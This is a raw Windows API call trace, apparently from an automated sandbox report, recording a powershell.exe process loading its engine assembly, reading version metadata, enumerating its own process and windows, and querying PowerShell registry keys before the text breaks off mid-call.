1 [0096.609] SetErrorMode (uMode=0x1) returned 0x1 [0096.612] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10dd20 | out: lpdwHandle=0x10dd20) returned 0x94c [0096.614] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2df6fd8 | out: lpData=0x2df6fd8) returned 1 [0096.617] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10dc98, puLen=0x10dc90 | out: lplpBuffer=0x10dc98*=0x2df7074, puLen=0x10dc90) returned 1 [0096.619] lstrlenW (lpString="䅁") returned 1 [0096.629] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x2df7150, puLen=0x10dc00) returned 1 [0096.630] lstrlenW (lpString="Microsoft Corporation") returned 21 [0096.632] CoTaskMemAlloc (cb=0x2e) returned 0x2865d0 [0096.632] lstrcpyW (in: lpString1=0x2865d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0096.633] CoTaskMemFree (pv=0x2865d0) [0096.633] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x2df71a4, puLen=0x10dc00) returned 1 [0096.633] lstrlenW (lpString="System.Management.Automation") returned 28 [0096.634] CoTaskMemAlloc (cb=0x3c) returned 0x28b830 [0096.634] lstrcpyW (in: lpString1=0x28b830, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0096.634] CoTaskMemFree (pv=0x28b830) [0096.634] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x2df7200, puLen=0x10dc00) returned 1 [0096.634] lstrlenW (lpString="6.1.7601.17514") returned 14 [0096.634] CoTaskMemAlloc (cb=0x20) returned 0x2914f0 [0096.634] lstrcpyW (in: lpString1=0x2914f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0096.634] CoTaskMemFree (pv=0x2914f0) [0096.634] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x2df7240, puLen=0x10dc00) returned 1 [0096.634] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0096.634] CoTaskMemAlloc (cb=0x44) returned 0x28b830 [0096.634] lstrcpyW (in: lpString1=0x28b830, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0096.634] CoTaskMemFree (pv=0x28b830) [0096.634] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x2df72a8, puLen=0x10dc00) returned 1 [0096.634] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0096.634] CoTaskMemAlloc (cb=0x76) returned 0x230930 [0096.634] lstrcpyW (in: lpString1=0x230930, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0096.634] CoTaskMemFree (pv=0x230930) [0096.634] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x2df7344, puLen=0x10dc00) returned 1 [0096.634] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0096.634] CoTaskMemAlloc (cb=0x44) returned 0x28b830 [0096.634] lstrcpyW (in: lpString1=0x28b830, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0096.634] CoTaskMemFree (pv=0x28b830) [0096.634] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x2df73a8, puLen=0x10dc00) returned 1 [0096.634] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0096.634] CoTaskMemAlloc (cb=0x58) returned 0x1febc0 [0096.635] lstrcpyW (in: lpString1=0x1febc0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0096.635] CoTaskMemFree (pv=0x1febc0) [0096.635] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x2df7424, puLen=0x10dc00) returned 1 [0096.635] lstrlenW (lpString="6.1.7601.17514") returned 14 [0096.635] CoTaskMemAlloc (cb=0x20) returned 0x2914f0 [0096.635] lstrcpyW (in: lpString1=0x2914f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0096.635] CoTaskMemFree (pv=0x2914f0) [0096.635] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x2df70cc, puLen=0x10dc00) returned 1 [0096.635] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0096.635] CoTaskMemAlloc (cb=0x66) returned 0x221880 [0096.635] lstrcpyW (in: lpString1=0x221880, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0096.635] CoTaskMemFree (pv=0x221880) [0096.635] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x0, puLen=0x10dc00) returned 0 [0096.635] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x0, puLen=0x10dc00) returned 0 [0096.635] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10dc08, puLen=0x10dc00 | out: lplpBuffer=0x10dc08*=0x0, puLen=0x10dc00) returned 0 [0096.635] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10dbd8, puLen=0x10dbd0 | out: lplpBuffer=0x10dbd8*=0x2df7074, puLen=0x10dbd0) returned 1 [0096.636] CoTaskMemAlloc (cb=0x204) returned 0x23c2b0 [0096.636] VerLanguageNameW (in: wLang=0x0, szLang=0x23c2b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0096.638] CoTaskMemFree (pv=0x23c2b0) [0096.638] VerQueryValueW (in: pBlock=0x2df6fd8, lpSubBlock="\\", lplpBuffer=0x10dc28, puLen=0x10dc20 | out: lplpBuffer=0x10dc28*=0x2df7000, puLen=0x10dc20) returned 1 [0096.644] GetCurrentProcessId () returned 0x860 [0096.662] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x10cb50 | out: lpLuid=0x10cb50*(LowPart=0x14, HighPart=0)) returned 1 [0096.665] GetCurrentProcess () returned 0xffffffffffffffff [0096.666] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x10cb70 | out: TokenHandle=0x10cb70*=0x2f8) returned 1 [0096.667] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x2dfa850*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0096.668] CloseHandle (hObject=0x2f8) returned 1 [0096.673] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x2f8 [0096.683] EnumProcessModules (in: hProcess=0x2f8, lphModule=0x2dfa8b8, cb=0x200, lpcbNeeded=0x10db88 | out: lphModule=0x2dfa8b8, lpcbNeeded=0x10db88) returned 1 [0096.685] GetModuleInformation (in: hProcess=0x2f8, hModule=0x13f480000, lpmodinfo=0x2dfab28, cb=0x18 | out: lpmodinfo=0x2dfab28*(lpBaseOfDll=0x13f480000, SizeOfImage=0x77000, EntryPoint=0x13f48c63c)) returned 1 [0096.686] CoTaskMemAlloc (cb=0x804) returned 0x297650 [0096.686] GetModuleBaseNameW (in: hProcess=0x2f8, hModule=0x13f480000, lpBaseName=0x297650, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0096.686] CoTaskMemFree (pv=0x297650) [0096.687] CoTaskMemAlloc (cb=0x804) returned 0x297650 [0096.687] GetModuleFileNameExW (in: hProcess=0x2f8, hModule=0x13f480000, lpFilename=0x297650, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0096.687] CoTaskMemFree (pv=0x297650) [0096.688] CloseHandle (hObject=0x2f8) returned 1 [0096.696] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x860) returned 0x2f8 [0096.699] GetExitCodeProcess (in: hProcess=0x2f8, lpExitCode=0x10dcb8 | out: lpExitCode=0x10dcb8*=0x103) returned 1 [0096.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dfb088, Length=0x20000, ResultLength=0x10dc80 | out: SystemInformation=0x12dfb088, ResultLength=0x10dc80*=0x11860) returned 0x0 [0096.723] EnumWindows (lpEnumFunc=0x2ae66ac, lParam=0x0) returned 0 [0096.724] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.724] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x538 [0096.725] GetWindowThreadProcessId (in: hWnd=0x300b6, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.725] GetWindowThreadProcessId (in: hWnd=0x300ba, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.725] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.725] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x514 [0096.725] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.725] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x778 [0096.725] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x778 [0096.725] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.725] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.725] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.725] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.726] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.726] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.726] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.726] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.726] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x458 [0096.726] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.726] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x4ac [0096.726] GetWindowThreadProcessId (in: hWnd=0x5011e, lpdwProcessId=0x10d9e0 | out: lpdwProcessId=0x10d9e0) returned 0x870 [0096.727] GetWindow (hWnd=0x5011e, uCmd=0x4) returned 0x0 [0096.728] IsWindowVisible (hWnd=0x5011e) returned 1 [0096.731] WerSetFlags () returned 0x0 [0096.739] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0096.741] CoTaskMemFree (pv=0x0) [0096.742] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10dd48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10dd40 | out: pulNumLanguages=0x10dd48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10dd40) returned 1 [0096.742] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10dd48, pwszLanguagesBuffer=0x2e21f10, pcchLanguagesBuffer=0x10dd40 | out: pulNumLanguages=0x10dd48, pwszLanguagesBuffer=0x2e21f10, pcchLanguagesBuffer=0x10dd40) returned 1 [0096.749] CoTaskMemAlloc (cb=0x24) returned 0x291640 [0096.749] GetUserDefaultLocaleName (in: lpLocaleName=0x291640, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0096.749] CoTaskMemFree (pv=0x291640) [0096.771] CoTaskMemAlloc (cb=0x104) returned 0x20e0c0 [0096.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0096.771] CoTaskMemFree (pv=0x20e0c0) [0096.773] CoTaskMemAlloc (cb=0x104) returned 0x20e0c0 [0096.773] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0096.773] CoTaskMemFree (pv=0x20e0c0) [0096.775] CoTaskMemAlloc (cb=0x104) returned 0x20e0c0 [0096.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0096.775] CoTaskMemFree (pv=0x20e0c0) [0096.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0096.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0096.785] SetErrorMode (uMode=0x1) returned 0x1 [0096.785] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10d9c0 | out: lpFileInformation=0x10d9c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0096.785] SetErrorMode (uMode=0x1) returned 0x1 [0096.785] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10dc30 | out: lpdwHandle=0x10dc30) returned 0x94c [0096.786] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e257a0 | out: lpData=0x2e257a0) returned 1 [0096.787] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10dba8, puLen=0x10dba0 | out: lplpBuffer=0x10dba8*=0x2e2583c, puLen=0x10dba0) returned 1 [0096.787] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x2e25918, puLen=0x10db10) returned 1 [0096.787] lstrlenW (lpString="Microsoft Corporation") returned 21 [0096.787] CoTaskMemAlloc (cb=0x2e) returned 0x29a500 [0096.787] lstrcpyW (in: lpString1=0x29a500, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0096.787] CoTaskMemFree (pv=0x29a500) [0096.787] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x2e2596c, puLen=0x10db10) returned 1 [0096.787] lstrlenW (lpString="System.Management.Automation") returned 28 [0096.787] CoTaskMemAlloc (cb=0x3c) returned 0x28bd30 [0096.787] lstrcpyW (in: lpString1=0x28bd30, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0096.787] CoTaskMemFree (pv=0x28bd30) [0096.787] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x2e259c8, puLen=0x10db10) returned 1 [0096.787] lstrlenW (lpString="6.1.7601.17514") returned 14 [0096.788] CoTaskMemAlloc (cb=0x20) returned 0x2916a0 [0096.788] lstrcpyW (in: lpString1=0x2916a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0096.788] CoTaskMemFree (pv=0x2916a0) [0096.788] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x2e25a08, puLen=0x10db10) returned 1 [0096.788] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0096.788] CoTaskMemAlloc (cb=0x44) returned 0x28bd30 [0096.788] lstrcpyW (in: lpString1=0x28bd30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0096.788] CoTaskMemFree (pv=0x28bd30) [0096.788] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x2e25a70, puLen=0x10db10) returned 1 [0096.788] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0096.788] CoTaskMemAlloc (cb=0x76) returned 0x230930 [0096.788] lstrcpyW (in: lpString1=0x230930, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0096.788] CoTaskMemFree (pv=0x230930) [0096.788] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x2e25b0c, puLen=0x10db10) returned 1 [0096.788] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0096.788] CoTaskMemAlloc (cb=0x44) returned 0x28bd30 [0096.788] lstrcpyW (in: lpString1=0x28bd30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0096.788] CoTaskMemFree (pv=0x28bd30) [0096.788] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x2e25b70, puLen=0x10db10) returned 1 [0096.788] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0096.788] CoTaskMemAlloc (cb=0x58) returned 0x1feb00 [0096.788] lstrcpyW (in: lpString1=0x1feb00, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0096.788] CoTaskMemFree (pv=0x1feb00) [0096.788] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x2e25bec, puLen=0x10db10) returned 1 [0096.788] lstrlenW (lpString="6.1.7601.17514") returned 14 [0096.788] CoTaskMemAlloc (cb=0x20) returned 0x2916a0 [0096.788] lstrcpyW (in: lpString1=0x2916a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0096.788] CoTaskMemFree (pv=0x2916a0) [0096.788] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x2e25894, puLen=0x10db10) returned 1 [0096.788] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0096.788] CoTaskMemAlloc (cb=0x66) returned 0x28ff40 [0096.788] lstrcpyW (in: lpString1=0x28ff40, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0096.789] CoTaskMemFree (pv=0x28ff40) [0096.789] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x0, puLen=0x10db10) returned 0 [0096.789] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x0, puLen=0x10db10) returned 0 [0096.789] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10db18, puLen=0x10db10 | out: lplpBuffer=0x10db18*=0x0, puLen=0x10db10) returned 0 [0096.789] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10dae8, puLen=0x10dae0 | out: lplpBuffer=0x10dae8*=0x2e2583c, puLen=0x10dae0) returned 1 [0096.789] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0096.789] VerLanguageNameW (in: wLang=0x0, szLang=0x23c0a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0096.789] CoTaskMemFree (pv=0x23c0a0) [0096.789] VerQueryValueW (in: pBlock=0x2e257a0, lpSubBlock="\\", lplpBuffer=0x10db38, puLen=0x10db30 | out: lplpBuffer=0x10db38*=0x2e257c8, puLen=0x10db30) returned 1 [0096.797] CoTaskMemAlloc (cb=0x104) returned 0x20e0c0 [0096.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0096.797] CoTaskMemFree (pv=0x20e0c0) [0096.801] CoTaskMemAlloc (cb=0x104) returned 0x20e0c0 [0096.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0096.801] CoTaskMemFree (pv=0x20e0c0) [0096.805] lstrlenW (lpString="䅁") returned 1 [0096.816] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10da08 | out: phkResult=0x10da08*=0x310) returned 0x0 [0096.817] RegOpenKeyExW (in: hKey=0x310, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d9f8 | out: phkResult=0x10d9f8*=0x314) returned 0x0 [0096.817] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10da88 | out: phkResult=0x10da88*=0x318) returned 0x0 [0096.820] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d9cc, lpData=0x0, lpcbData=0x10d9c8*=0x0 | out: lpType=0x10d9cc*=0x1, lpData=0x0, lpcbData=0x10d9c8*=0x56) returned 0x0 [0096.821] CoTaskMemAlloc (cb=0x5a) returned 0x28fed0 [0096.821] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d99c, lpData=0x28fed0, lpcbData=0x10d998*=0x56 | out: lpType=0x10d99c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d998*=0x56) returned 0x0 [0096.821] CoTaskMemFree (pv=0x28fed0) [0096.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0096.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0096.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0096.852] CoTaskMemAlloc (cb=0x104) returned 0x20e0c0 [0096.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20e0c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0096.852] CoTaskMemFree (pv=0x20e0c0) [0097.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d5c0, lpFilePart=0x0 | 